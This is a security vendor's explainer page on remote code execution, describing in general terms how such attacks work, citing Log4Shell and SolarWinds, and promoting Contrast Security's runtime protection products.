Remote code execution (RCE)

Get a free trial of Contrast ADR and see how it can protect your applications from cyberattacks that result in RCE. 

What is an RCE vulnerability?

RCE occurs when an attacker runs arbitrary code on a remote computer or server over a network. This type of attack exploits vulnerabilities in software, applications or network configurations to execute commands without needing physical access to the system.

How remote code execution attacks work

RCE vulnerabilities (i.e., vulnerabilities that can lead to RCE) are often exploited through injection attacks, such as an SQL injection, or by exploiting unpatched software flaws. Here’s how they generally work:

• Finding vulnerabilities: Attackers may look for security vulnerabilities in applications that allow for unauthorized code execution. Or if a system improperly validates inputs, attackers may inject code into form fields or URLs to run commands. Additionally, systems with loose security settings — like weak authentication mechanisms, misconfigured access controls and unrestricted remote procedure calls (RPCs) — can be exploited for RCE.
• Crafting malicious payloads: Attackers sometimes create code that exploits a vulnerability and injects a malicious payload  into the target system. Another option is to use OS-level commands or scripts that the vulnerable system executes, giving the attacker control over the system. Still another option is to use shellcode — i.e., binary code that opens a command-line interface (CLI) — to run arbitrary commands on the target.
• Delivering malicious payloads: RCE payloads are often delivered through web requests, emails, compromised third-party applications and exploitation of vulnerable network protocols. Attackers may upload files that contain malicious code, which gets executed by the vulnerable system. Sometimes, attackers trick users into performing actions (e.g., clicking links or opening attachments) that trigger RCE.
• Gaining control and persistence: Attackers may try to gain higher-level privileges (like admin access) once they can execute code, expanding their control. They often install backdoors or other malicious software to maintain access even if the vulnerability is patched.  Many attackers use command & control servers (C2) servers to communicate with compromised systems, issuing commands and retrieving data.

How attackers use RCE

RCE vulnerabilities can be extremely dangerous to an organization, as they can enable an attacker to do anything that a logged-in user can do in an account. Imagine the impact that could have in a business-critical application used to manage sensitive data: Malicious actors could access confidential customer data (financial, personal or health information), employee data (personal or HR information), or intellectual property (product development data and go-to-market plans).

Examples of RCE attacks

Log4j is a recent example of a highly impactful application-layer attack that allowed attackers to perform RCE by exploiting improper input handling. Log4Shell is the nickname provided to the RCE vulnerability that was disclosed in the Log4j utility managed by the Apache Foundation. Specifically, Log4Shell refers to [CVE-2021-44228] and associated vulnerabilities.

If an application is using a vulnerable version of Log4j, an attacker can trigger the application to reach out to an attacker-controlled host, which then deploys malicious code on the application’s server and gives the attacker control over the application and the server it sits on. Log4Shell is a critical vulnerability. It can allow attackers to execute malicious code remotely on a targeted server or application. If exploited, impact can include theft of data, installation of malware and full takeover of the system. A single web request can be enough to initiate a Log4j hack. Often the request can occur even before a user is authenticated.

Another serious RCE vulnerability was the attack on the SolarWinds Orion platform. Attackers first gained access to vulnerable systems in September 2019 and may have enjoyed unfettered access through to the attack’s December 2020 discovery. 

How to detect and prevent RCE attacks

Every organization needs to think of the entire software supply chain when considering Application Security (AppSec):

• What you write: Custom code developed in-house accounts for most software vulnerabilities.
• What you build with: Organizations often do not track which developer tools are in use. More than 1,000 of these tools exist.
• What you use: Third-party libraries create a complex web of dependencies in an application.
• What you buy: Off-the-shelf software-as-a-service (SaaS) applications provide business-critical functionality, but their users have no control over the integrity of the software.

The best way to detect and prevent RCE attacks is to have robust protections in place in pre-production and production environments.

• In a pre-production environment, Software Composition Analysis (SCA) is hugely beneficial for examining the third-party libraries that your project uses for cybersecurity vulnerabilities.
• An Interactive Application Security Testing (IAST) solution can continuously detect and prioritize vulnerabilities while also guiding development teams on how to eliminate risks. 
• ADR is ideal for production. Unlike web application firewalls (WAFs), which help with visibility into security issues stemming from low-skilled attackers and are generally bad at providing protection against attacks that exploit logic flaws and zero-day vulnerabilities, Contrast ADR protects running applications and application programming interfaces (APIs) by stopping attacks that would otherwise bypass other first-line defense tools.  

Contrast Security’s approach to Application Security (AppSec) is designed to eliminate entire classes of vulnerabilities. The Contrast Runtime Security Platform was created in response to the fact that applications are perpetually accosted by hackers intent on doing harm to your business. We recognize that it is virtually impossible to create applications that are completely free of vulnerabilities. The Runtime Security agent continuously detects and prevents both known threats and zero-day attacks by leveraging multi-technique precision sensors and dynamic control over the runtime. It offers an instrumentation-based approach that simplifies security deployment and scalability. 

 Get a free trial of Contrast ADR and see how it can protect your applications from RCE attacks.